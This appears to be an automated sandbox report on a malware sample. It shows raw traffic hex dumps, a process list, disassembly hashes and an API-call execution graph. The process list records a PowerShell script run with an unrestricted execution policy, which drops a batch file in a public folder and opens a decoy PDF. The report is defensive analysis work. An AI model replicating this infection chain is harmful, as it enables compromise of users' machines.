                                                      2023-06-01 10:14:23 UTC297INData Raw: 83 65 9f 0a db b0 af f7 4b 23 87 b6 34 88 f1 9f ca c8 c8 46 8e 09 e0 4b 47 06 68 98 a1 d4 ed 0d ed e0 45 66 ba 1c 3f 70 0f f6 8e a9 42 4a 02 35 2a bc ad 3e 4a 94 7f 35 ce 36 1a f6 2a ed af 21 06 8b 7a 96 b7 66 fe 3e 0d b9 94 15 8d f1 34 2b ea 9b 2c 5d de 9c 3c 9c 30 ed 28 3f 31 af 9c 11 62 a5 05 fc b0 06 f7 aa b0 5f c9 b9 30 88 be b4 9f 54 82 85 a6 a6 e7 e0 bf 3a 77 d0 38 f5 56 2a 09 fd a8 70 27 99 fe 6b ed 7d c6 ea 6a ca 78 57 92 89 c3 55 25 3e 96 b3 b5 08 55 17 fb 6f db 8a c8 d8 e2 3a f1 3d 98 9b 05 9b 10 18 34 31 8d 51 d8 86 3c 63 0e 67 f8 24 41 d1 0f b9 45 d1 56 03 66 a4 a1 13 fa 34 30 e0 c9 d7 65 2b 00 75 f4 c4 34 77 17 50 99 34 25 93 f3 7f 21 de 61 c2 4c 65 df 93 da 61 24 d1 9e 85 de ca b0 75 1d b6 fd d8 58 f1 1f 82 c5 db 90 02 d5 fe ea 32 4e c0 b3
                                                      Data Ascii: eK#4FKGhEf?pBJ5*>J56*!zf>4+,]<0(?1b_0T:w8V*p'k}jxWU%>Uo:=41Q<cg$AEVf40e+u4wP4%!aLea$uX2N
                                                      2023-06-01 10:14:23 UTC304INData Raw: c5 bd 5d ea 80 6b d7 1b 4c 6a c4 95 03 ec ed ee 50 8a 01 89 94 1c d8 b9 26 0a ce de bc 07 ff 21 37 0d 5f c0 7b 5e 01 f9 6f 2e 21 a3 c5 ce 56 76 85 ab 0f 88 2d 86 f3 af cd e3 5a 85 e2 22 2a 8d b3 5b 9d 0d 17 50 6a ef a8 f4 2d e6 d8 f9 53 e8 e3 ea 68 19 fb a6 28 d1 99 3b 33 59 2c 47 1a c2 72 f7 41 de 8a 2c 37 18 44 c2 bb 48 bb ed cb 84 75 e5 34 68 be c3 a4 04 18 25 77 f6 dd 61 1d 49 68 ff 5e 5e 2d 4e 93 32 92 8e ec 8b 06 96 a8 1e 28 eb 74 c7 ab 91 c0 98 e1 2d a8 a4 5c d3 68 0c 0e b7 c0 24 63 99 ee ac 86 a1 01 fa ff 2b a0 9f d0 b4 7b 63 b6 31 1f da 4b df 72 30 99 28 ec 40 cd 06 2e 06 a7 e8 e1 72 98 be ae 4a 7a 01 3b 61 89 ae 5b 2b c2 48 ce 65 fa d4 75 cf 06 c3 a0 8f e3 c7 8a 53 cc 83 98 c2 e1 c9 f5 63 d5 ee cd 43 4e 2e a4 de 0a 04 4c f6 a2 8a f6 5c 1e 4c a8
                                                      Data Ascii: ]kLjP&!7_{^o.!Vv-Z"*[Pj-Sh(;3Y,GrA,7DHu4h%waIh^^-N2(t-\h$c+{c1Kr0(@.rJz;a[+HeuScCN.L\L
                                                      2023-06-01 10:14:23 UTC312INData Raw: 83 f4 7b ba 44 80 61 bf 29 0b 6e 96 8b f5 23 6d 98 58 cc dd 61 9c df b1 d9 a0 7c 0f 39 6f 01 82 10 09 bd a4 f9 ec 9d 26 fc f5 07 1e 2e eb c4 d2 83 0c 89 8f 7d e8 f0 41 ef 60 ef d8 9f 9d 75 a4 37 04 44 dd 08 ee 8c 5e ed 3a 7f 72 13 aa 2f 2a b2 5c f3 d8 f1 26 69 11 72 d3 d6 db 28 56 f4 b3 2f cb 25 83 90 dc ae 45 6e 1f 6d 10 b3 ae 70 2b e0 7c 8d 99 f0 db 2f ae 2a 78 20 e8 ae 98 2c b7 14 26 a6 64 97 fd 6b 4c fd 33 d6 83 42 62 45 5b 7c 08 a6 1c 66 a3 d3 4a 79 d3 a6 08 57 32 63 08 c9 10 7f 1f a1 e7 3a e5 a2 16 8f 64 34 be cd 1a 13 e0 e6 69 4d ca 48 cd ed 3f 17 00 e3 77 70 00 e3 08 c1 c5 ad 0f fb a1 82 fa d8 7d 24 36 4c 53 42 e5 22 28 0a b1 66 a6 d6 13 3f 5f 07 d5 18 74 b3 90 69 c9 f5 bb 53 8f d8 fe c9 54 56 ff a4 5f e6 93 e7 99 07 f6 5f 5b 7f 31 47 1c ac 93 7c
                                                      Data Ascii: {Da)n#mXa|9o&.}A`u7D^:r/*\&ir(V/%Enmp+|/*x ,&dkL3BbE[|fJyW2c:d4iMH?wp}$6LSB"(f?_tiSTV__[1G|
                                                      2023-06-01 10:14:23 UTC320INData Raw: 9d a2 e0 69 93 0f 84 c4 d3 8a 0a 05 0a bc dd 19 12 17 90 36 9d 3d dd 1d ad 0a 66 0c 8e db 7c fc 08 17 85 2a c5 ec ea 7e 28 e2 e5 dd 88 8d 80 77 77 42 94 d8 85 cb 1a a7 21 65 73 51 cf 76 d9 58 6f ef 21 93 58 82 d5 87 6c a7 38 db b1 c2 20 80 a5 5a e6 a8 9b 31 e8 bf ea ae 77 c3 69 07 d0 dd bc 2c 6e 19 1d 1a 6f d3 f6 e9 a2 99 89 8d e3 dc a6 2d 7c d5 b3 69 3b 08 95 ba 16 7e de ce 93 76 1e 05 76 3e ec cf fc 60 1f 06 1b d7 5b 18 4a 67 31 ec f0 d5 b6 a1 00 d0 14 6a 3d 56 dc c8 1c 0c 45 dd ae 32 71 42 a5 c7 30 2b c3 8f e1 86 90 42 fa 63 03 a9 9b 34 f7 52 90 eb f0 05 8a 41 67 10 83 8e 07 3e 58 76 5c 3f 6f b1 a2 53 f8 b9 e9 81 97 80 f7 3e ab e9 8c 1a 02 ce e8 f1 2f 10 f5 ac 67 05 59 95 46 57 af 86 83 11 e4 f9 a4 37 b4 1b f9 b0 eb 9a 06 c7 af d4 34 f0 ae a3 84 b9 e7
                                                      Data Ascii: i6=f|*~(wwB!esQvXo!Xl8 Z1wi,no-|i;~vv>`[Jg1j=VE2qB0+Bc4RAg>Xv\?oS>/gYFW74
                                                      2023-06-01 10:14:23 UTC328INData Raw: 93 cb 1d f6 87 3b 47 9a b6 de 49 bc 4f 9e e0 31 f2 b6 40 cd 7c 13 5c 69 dc 21 3d d2 1a 81 8f db 8d 57 89 b9 89 3e db 1f 9b f4 7a 19 93 de b0 03 bd e3 ee 03 09 86 87 d2 25 8d 90 51 0e 47 b3 a1 55 1c e7 d9 be a1 12 5f 99 91 d7 0f 43 95 96 33 a0 4d c9 9d f9 98 db 9d 7c cd 3b 80 b6 50 87 e2 27 59 cf ac dc c4 80 bb 95 c5 e3 b2 d1 2b 2c b1 e0 be 38 02 bc 7c 07 1d 8f 04 af d8 6f fa 7b 42 bb f8 9b 73 5e d8 44 a8 21 57 5a 7d 5c d1 3c 35 4a a4 f9 19 bd 2b ef af 3c d8 58 3e b7 16 ad 9b 41 3b 2f 80 19 81 bd 76 b9 14 87 c3 95 37 b2 6d cd c4 25 ba 56 0e df 58 78 26 96 6c 52 bd bd 2b 98 d3 7b 51 96 0c 2d 5e 86 b3 5b f0 ef c8 42 25 6b 91 53 de 9a f3 67 17 bb 7f 64 ec e4 16 c6 38 83 69 df 81 2a 59 15 28 58 c2 13 da 87 77 be 41 4f f4 f2 1c fb bb 1b c2 37 24 f6 89 ed 65 d5
                                                      Data Ascii: ;GIO1@|\i!=W>z%QGU_C3M|;P'Y+,8|o{Bs^D!WZ}\<5J+<X>A;/v7m%VXx&lR+{Q-^[B%kSgd8i*Y(XwAO7$e
                                                      2023-06-01 10:14:23 UTC336INData Raw: ad e7 00 41 12 bd 7c 50 6d 6b 1e 11 31 27 9e 3c 43 2b 1f 77 2a 0d 67 fb cc 09 f7 57 34 1c 4d 75 8b d4 36 52 0d 1e e3 99 cf 29 22 71 bb e2 56 ff e8 7c 16 b6 5c 01 00 80 5d 00 00 80 00 00 1e 0f cb 87 11 d8 ce 66 91 0f 83 1e ca fd 7b 33 d4 7f e9 b7 da 28 31 76 25 66 20 4d 2a 09 6d 6a f7 29 70 38 30 e7 cc 1d 56 17 b0 33 ba 47 46 e1 ec 9d a0 05 65 42 a2 ab b4 e0 13 ea 1b b9 7e c0 33 7e 58 39 6c 7e 61 d3 13 6d 5b 6f a8 d9 37 fd d3 6c c9 23 ba 79 3a 29 2e da 5c 1b 28 3b c5 84 24 cc 97 01 21 da c9 ff 31 41 87 2a e3 b9 92 5b 94 c7 21 85 38 7d f2 f2 e9 b5 52 97 ba 2a 10 a5 f0 45 63 ac 61 92 7f 8d db be 69 26 dc 22 03 c6 76 60 04 8f 8b f7 52 4e ce 96 33 9f a4 55 9b 34 49 5c d0 20 72 4d b7 1e e6 22 1c e5 b1 ae 97 fe 5c 80 89 07 b9 2d 80 c1 45 e6 d1 75 63 4c 68 f8 96
                                                      Data Ascii: A|Pmk1'<C+w*gW4Mu6R)"qV|\]f{3(1v%f M*mj)p80V3GFeB~3~X9l~am[o7l#y:).\(;$!1A*[!8}R*Ecai&"v`RN3U4I\ rM"\-EucLh


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:12:14:18
                                                      Start date:01/06/2023
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\zk.ps1
                                                      Imagebase:0x7ff7fbaf0000
                                                      File size:447488 bytes
                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Target ID:1
                                                      Start time:12:14:18
                                                      Start date:01/06/2023
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:2
                                                      Start time:12:14:24
                                                      Start date:01/06/2023
                                                      Path:C:\Users\Public\wusb.bat
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\Public\wusb.bat"
                                                      Imagebase:0x400000
                                                      File size:344681 bytes
                                                      MD5 hash:9DCA43CB15D97693D2DE73683804C5C7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 3%, ReversingLabs
                                                      Reputation:low

                                                      General

                                                      Target ID:3
                                                      Start time:12:14:28
                                                      Start date:01/06/2023
                                                      Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf
                                                      Imagebase:0x880000
                                                      File size:2571312 bytes
                                                      MD5 hash:B969CF0C7B2C443A99034881E8C8740A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:6
                                                      Start time:12:14:36
                                                      Start date:01/06/2023
                                                      Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                      Imagebase:0xbe0000
                                                      File size:9475120 bytes
                                                      MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FF9A59051F0 Relevance: .8, Instructions: 768COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.513897038.00007FF9A5900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff9a5900000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb3f2c0508ee7f2dea90aafc6d7c10c6f7ce09c54c0100cfbf0be9ecfcfd6a3d
                                                        • Instruction ID: 079ef046c53a1dc88b6bb7d87ff102dca04240913f2baf8b362e3ef1af3e7c91
                                                        • Opcode Fuzzy Hash: bb3f2c0508ee7f2dea90aafc6d7c10c6f7ce09c54c0100cfbf0be9ecfcfd6a3d
                                                        • Instruction Fuzzy Hash: DF02F731A0DA498FEB45DF1CC495AA97BF1FFAA710F1441BAD489CB292CB64F841C781
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF9A59D1210 Relevance: .5, Instructions: 476COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.514618095.00007FF9A59D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A59D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff9a59d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4756ca4f73ab05ce133510fd710fe57617f27789321357099ba640204570d674
                                                        • Instruction ID: 26a35048845d7804206599fb89cd44cc1dbc227003212a86f55462f0ffa018cf
                                                        • Opcode Fuzzy Hash: 4756ca4f73ab05ce133510fd710fe57617f27789321357099ba640204570d674
                                                        • Instruction Fuzzy Hash: F0E11623A0EBC60FE75AD62858652757BE1EF87610B8801FAD58DCB1D3EB59AC058342
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF9A59D4475 Relevance: .4, Instructions: 420COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.514618095.00007FF9A59D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A59D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff9a59d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 20509d0d94751a6b3bdc95bd046b656a21ef08c0f394e7e594f9cfcb7d045362
                                                        • Instruction ID: 188010e3dc5b6a42d180e6551433cff5808aa30bc4f6c8f68570a052a0d81a7b
                                                        • Opcode Fuzzy Hash: 20509d0d94751a6b3bdc95bd046b656a21ef08c0f394e7e594f9cfcb7d045362
                                                        • Instruction Fuzzy Hash: CDC15C32A0EB894FE7A5DB2858552B57FE0EF97710B8800BED18DCB193DA9DAC01C351
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF9A59035FA Relevance: .3, Instructions: 320COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.513897038.00007FF9A5900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff9a5900000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7fc314360b5a7a8e8f13b4b409c949dfd58d6ae8ba1acb3633c795fa5780150a
                                                        • Instruction ID: 3d9b0af7dcebb68f44bb36e8bd034fbcc41654b63f82d4316525861e5f0b385d
                                                        • Opcode Fuzzy Hash: 7fc314360b5a7a8e8f13b4b409c949dfd58d6ae8ba1acb3633c795fa5780150a
                                                        • Instruction Fuzzy Hash: CE91573160D7854FE709EB2CE8955B17BE0EF97720B1801BED489CB2A3EA55BC46C781
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF9A59D454A Relevance: .2, Instructions: 175COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.514618095.00007FF9A59D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A59D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff9a59d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbe6bc58c3e9beee57102860927f5103ea11579960057656f4695a837441da1c
                                                        • Instruction ID: eba98806784f2c3ba4ba4d7da74506ae20d16a1889f919af350c12c00fac906e
                                                        • Opcode Fuzzy Hash: dbe6bc58c3e9beee57102860927f5103ea11579960057656f4695a837441da1c
                                                        • Instruction Fuzzy Hash: F251E663F0E6864FEB96D76844652786B91EF97A40BC800BDC18ECF1C3DA8DBC018351
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF9A59D13F4 Relevance: .1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.514618095.00007FF9A59D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A59D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff9a59d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c8634e68fff513077542e6fb1e07ff4dd0afb486c49a90e44f7e80a6d8cb2d47
                                                        • Instruction ID: d639a6c0eed577fb929edab690481760414ce4cfde37a27c6b9443de1d996036
                                                        • Opcode Fuzzy Hash: c8634e68fff513077542e6fb1e07ff4dd0afb486c49a90e44f7e80a6d8cb2d47
                                                        • Instruction Fuzzy Hash: 5E210123F0EB8A0FF3A5D62868512746AD2EF96A10B8810BAD68DCB192DF59BC015241
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF9A5901B34 Relevance: .1, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.513897038.00007FF9A5900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff9a5900000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93efd250008f3e00f74036f189b8291b6d56a99c600b74abf3621ac3b79bfcb0
                                                        • Instruction ID: 7d1a96eaf638325806572d520916acad1c7b0709f7a58810c735148d5a19c209
                                                        • Opcode Fuzzy Hash: 93efd250008f3e00f74036f189b8291b6d56a99c600b74abf3621ac3b79bfcb0
                                                        • Instruction Fuzzy Hash: 3821B23061CA494FE759EF18D4916BAB7E0FFD6320F50096DE18AC71A6EB26A842C701
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF9A5902140 Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.513897038.00007FF9A5900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff9a5900000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 38b32085bebe8084eb53a7443ffec0d38d449895fceb4692119295ddb2c4e9c8
                                                        • Instruction ID: 6bd79a6186674631b47270cf327d2d6b23d98730cd20ceaae1be3552c22113cd
                                                        • Opcode Fuzzy Hash: 38b32085bebe8084eb53a7443ffec0d38d449895fceb4692119295ddb2c4e9c8
                                                        • Instruction Fuzzy Hash: AE21903250CB884FC745EB14D85199ABBE1FFDA310F440A6EE48AD72A1DF64EA05C782
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF9A59D2185 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.514618095.00007FF9A59D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A59D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff9a59d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f815ef9deb4de72fd08d29e75c538f2954f80eb3b6abb1e1069d167a9e82ffaf
                                                        • Instruction ID: 2f57d983736c0291809a31e987fe4b98c5227b9bf9fae5b3367bc44d7c91fe39
                                                        • Opcode Fuzzy Hash: f815ef9deb4de72fd08d29e75c538f2954f80eb3b6abb1e1069d167a9e82ffaf
                                                        • Instruction Fuzzy Hash: B211A553E1E7C50FFAE6E378185527C5AA1EFA7A50BA884BAE28CCF1D3DD492C044351
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF9A59D2135 Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.514618095.00007FF9A59D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A59D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff9a59d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1df224c03104b815e61ae8fd7c16ed7f9f6ae3d3e94b4aaa99a6bbcf2896accb
                                                        • Instruction ID: 425d99a3e034f94896e8ed78ca6960588903df094e13a6fed612775b45682499
                                                        • Opcode Fuzzy Hash: 1df224c03104b815e61ae8fd7c16ed7f9f6ae3d3e94b4aaa99a6bbcf2896accb
                                                        • Instruction Fuzzy Hash: 16117243E1E7C60FFBE6D22818252686FA1EF97A51B9884FAE2C8CE093D94928054351
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF9A5905578 Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.513897038.00007FF9A5900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff9a5900000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b6673cfda5eb3e616dc7fb62c5949102958458d09ad57a64cb081b2cb06ea411
                                                        • Instruction ID: 97baa0200d3965cb5601de5e507c9b5b818b482427c4ef978c5b5dafcf9b1e2a
                                                        • Opcode Fuzzy Hash: b6673cfda5eb3e616dc7fb62c5949102958458d09ad57a64cb081b2cb06ea411
                                                        • Instruction Fuzzy Hash: C8F0373275C6044FDB4CAA1CF4429B573D1E795324B40056EE48FC2696D917F8468685
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00007FF9A5901CD8 Relevance: .5, Instructions: 510COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.513897038.00007FF9A5900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff9a5900000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 084e4c0c5d9bfe1394d5ba26589e82d19da2c55a24fa2a56172e6df7f1231daa
                                                        • Instruction ID: f85a0b87cef15ecc4b7d0b3122f0dfc1c5b1e480adf400f60709f86a70f87b02
                                                        • Opcode Fuzzy Hash: 084e4c0c5d9bfe1394d5ba26589e82d19da2c55a24fa2a56172e6df7f1231daa
                                                        • Instruction Fuzzy Hash: 5DE16831B0DA4A4FEB68DB1CD480771B7D1EF86710B548ABED5CECB596DB64B8428380
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:20.4%
                                                        Dynamic/Decrypted Code Coverage:13%
                                                        Signature Coverage:16.3%
                                                        Total number of Nodes:1561
                                                        Total number of Limit Nodes:42
                                                        execution_graph 5157 10001000 5160 1000101b 5157->5160 5167 10001516 5160->5167 5162 10001020 5163 10001024 5162->5163 5164 10001027 GlobalAlloc 5162->5164 5165 1000153d 3 API calls 5163->5165 5164->5163 5166 10001019 5165->5166 5169 1000151c 5167->5169 5168 10001522 5168->5162 5169->5168 5170 1000152e GlobalFree 5169->5170 5170->5162 4181 401941 4182 401943 4181->4182 4183 402c37 17 API calls 4182->4183 4184 401948 4183->4184 4187 40595a 4184->4187 4226 405c25 4187->4226 4190 405982 DeleteFileW 4192 401951 4190->4192 4191 405999 4193 405ab9 4191->4193 4240 40624c lstrcpynW 4191->4240 4193->4192 4258 40658f FindFirstFileW 4193->4258 4195 4059bf 4196 4059d2 4195->4196 4197 4059c5 lstrcatW 4195->4197 4241 405b69 lstrlenW 4196->4241 4198 4059d8 4197->4198 4201 4059e8 lstrcatW 4198->4201 4203 4059f3 lstrlenW FindFirstFileW 4198->4203 4201->4203 4203->4193 4211 405a15 4203->4211 4204 405ae2 4261 405b1d lstrlenW CharPrevW 4204->4261 4208 405a9c FindNextFileW 4208->4211 4212 405ab2 FindClose 4208->4212 4209 405912 5 API calls 4210 405af4 4209->4210 4213 405af8 4210->4213 4214 405b0e 4210->4214 4211->4208 4225 405a5d 4211->4225 4245 40624c lstrcpynW 4211->4245 4212->4193 4213->4192 4217 4052b0 24 API calls 4213->4217 4216 4052b0 24 API calls 4214->4216 4216->4192 4219 405b05 4217->4219 4218 40595a 60 API calls 4218->4225 4221 406012 36 API calls 4219->4221 4220 4052b0 24 API calls 4220->4208 4222 405b0c 4221->4222 4222->4192 4223 4052b0 24 API calls 4223->4225 4225->4208 4225->4218 4225->4220 4225->4223 4246 405912 4225->4246 4254 406012 MoveFileExW 4225->4254 4264 40624c lstrcpynW 4226->4264 4228 405c36 4265 405bc8 CharNextW CharNextW 4228->4265 4231 40597a 4231->4190 4231->4191 4232 4064e0 5 API calls 4238 405c4c 4232->4238 4233 405c7d lstrlenW 4234 405c88 4233->4234 4233->4238 4235 405b1d 3 API calls 4234->4235 4237 405c8d GetFileAttributesW 4235->4237 4236 40658f 2 API calls 4236->4238 4237->4231 4238->4231 4238->4233 4238->4236 4239 405b69 2 API calls 4238->4239 4239->4233 4240->4195 4242 405b77 4241->4242 4243 405b89 4242->4243 4244 405b7d CharPrevW 4242->4244 4243->4198 4244->4242 4244->4243 4245->4211 4271 405d19 GetFileAttributesW 4246->4271 4249 40593f 4249->4225 4250 405935 DeleteFileW 4252 40593b 4250->4252 4251 40592d RemoveDirectoryW 4251->4252 4252->4249 4253 40594b SetFileAttributesW 4252->4253 4253->4249 4255 406026 4254->4255 4257 406033 4254->4257 4274 405e98 4255->4274 4257->4225 4259 405ade 4258->4259 4260 4065a5 FindClose 4258->4260 4259->4192 4259->4204 4260->4259 4262 405ae8 4261->4262 4263 405b39 lstrcatW 4261->4263 4262->4209 4263->4262 4264->4228 4266 405be5 4265->4266 4270 405bf7 4265->4270 4267 405bf2 CharNextW 4266->4267 4266->4270 4268 405c1b 4267->4268 4268->4231 4268->4232 4269 405b4a CharNextW 4269->4270 4270->4268 4270->4269 4272 40591e 4271->4272 4273 405d2b SetFileAttributesW 4271->4273 4272->4249 4272->4250 4272->4251 4273->4272 4275 405ec8 4274->4275 4276 405eee GetShortPathNameW 4274->4276 4301 405d3e GetFileAttributesW CreateFileW 4275->4301 4277 405f03 4276->4277 4278 40600d 4276->4278 4277->4278 4280 405f0b wsprintfA 4277->4280 4278->4257 4283 40626e 17 API calls 4280->4283 4281 405ed2 CloseHandle GetShortPathNameW 4281->4278 4282 405ee6 4281->4282 4282->4276 4282->4278 4284 405f33 4283->4284 4302 405d3e GetFileAttributesW CreateFileW 4284->4302 4286 405f40 4286->4278 4287 405f4f GetFileSize GlobalAlloc 4286->4287 4288 405f71 4287->4288 4289 406006 CloseHandle 4287->4289 4303 405dc1 ReadFile 4288->4303 4289->4278 4294 405f90 lstrcpyA 4297 405fb2 4294->4297 4295 405fa4 4296 405ca3 4 API calls 4295->4296 4296->4297 4298 405fe9 SetFilePointer 4297->4298 4310 405df0 WriteFile 4298->4310 4301->4281 4302->4286 4304 405ddf 4303->4304 4304->4289 4305 405ca3 lstrlenA 4304->4305 4306 405ce4 lstrlenA 4305->4306 4307 405cec 4306->4307 4308 405cbd lstrcmpiA 4306->4308 4307->4294 4307->4295 4308->4307 4309 405cdb CharNextA 4308->4309 4309->4306 4311 405e0e GlobalFree 4310->4311 4311->4289 4312 4015c1 4313 402c37 17 API calls 4312->4313 4314 4015c8 4313->4314 4315 405bc8 4 API calls 4314->4315 4320 4015d1 4315->4320 4316 401631 4318 401663 4316->4318 4319 401636 4316->4319 4317 405b4a CharNextW 4317->4320 4323 401423 24 API calls 4318->4323 4339 401423 4319->4339 4320->4316 4320->4317 4329 401617 GetFileAttributesW 4320->4329 4331 405819 4320->4331 4334 40577f CreateDirectoryW 4320->4334 4343 4057fc CreateDirectoryW 4320->4343 4325 40165b 4323->4325 4328 40164a SetCurrentDirectoryW 4328->4325 4329->4320 4346 406626 GetModuleHandleA 4331->4346 4335 4057d0 GetLastError 4334->4335 